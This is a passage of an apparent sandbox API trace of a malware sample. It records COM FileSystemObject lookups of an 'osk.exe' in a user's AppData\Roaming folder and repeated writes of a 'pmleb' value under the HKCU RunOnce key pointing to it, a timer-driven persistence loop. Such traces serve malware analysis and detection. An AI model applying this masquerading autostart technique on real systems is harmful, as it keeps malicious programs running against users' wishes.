Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.914] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1c [0077.914] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.914] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1b [0077.915] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.915] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.915] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.915] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.915] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.915] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.915] WideCharToMultiByte 
(in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.915] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.915] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.915] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.915] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.915] RegCloseKey (hKey=0x280) returned 0x0 [0077.915] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.916] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.916] SetTimer (hWnd=0x20280, nIDEvent=0x201b, uElapse=0xa, 
lpTimerFunc=0x0) returned 0x201b [0077.916] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.067] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.067] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.067] KillTimer (hWnd=0x20280, uIDEvent=0x201b) returned 1 [0078.067] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.067] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.068] IUnknown:Release (This=0x787518) returned 0x1 [0078.068] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.068] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.068] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, 
bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.068] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.068] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.069] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c [0078.069] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, 
rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.069] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1d [0078.069] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.071] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1c [0078.071] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.071] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.071] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.071] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.071] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.071] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, 
cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0078.071] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.072] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.072] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.072] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.072] RegCloseKey (hKey=0x280) returned 0x0 [0078.072] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.072] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.072] SetTimer (hWnd=0x20280, nIDEvent=0x201c, uElapse=0xa, lpTimerFunc=0x0) returned 0x201c [0078.072] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.369] 
TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.369] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.369] KillTimer (hWnd=0x20280, uIDEvent=0x201c) returned 1 [0078.370] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.370] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.370] IUnknown:Release (This=0x787518) returned 0x1 [0078.370] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.370] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.370] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.370] FileSystemObject:IUnknown:Release 
(This=0x2b53a00) returned 0x1 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.370] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0078.371] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0078.371] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0078.371] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x1e [0078.371] FileSystemObject:IDispatch:Invoke 
(in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0078.371] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x1d [0078.371] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.372] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0078.372] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.372] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0078.372] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0078.372] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) 
returned 61 [0078.372] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0078.372] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0078.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0078.372] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0078.372] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0078.372] RegCloseKey (hKey=0x280) returned 0x0 [0078.372] IUnknown:Release (This=0x7a9740) returned 0x1 [0078.372] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.372] SetTimer (hWnd=0x20280, nIDEvent=0x201d, uElapse=0xa, lpTimerFunc=0x0) returned 0x201d [0078.373] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0078.380] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0078.380] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0078.380] KillTimer (hWnd=0x20280, uIDEvent=0x201d) returned 1 
[0078.381] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0078.381] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0078.381] IUnknown:Release (This=0x787518) returned 0x1 [0078.381] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0078.381] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0078.381] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0078.381] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, 
Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0078.381] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0078.381] 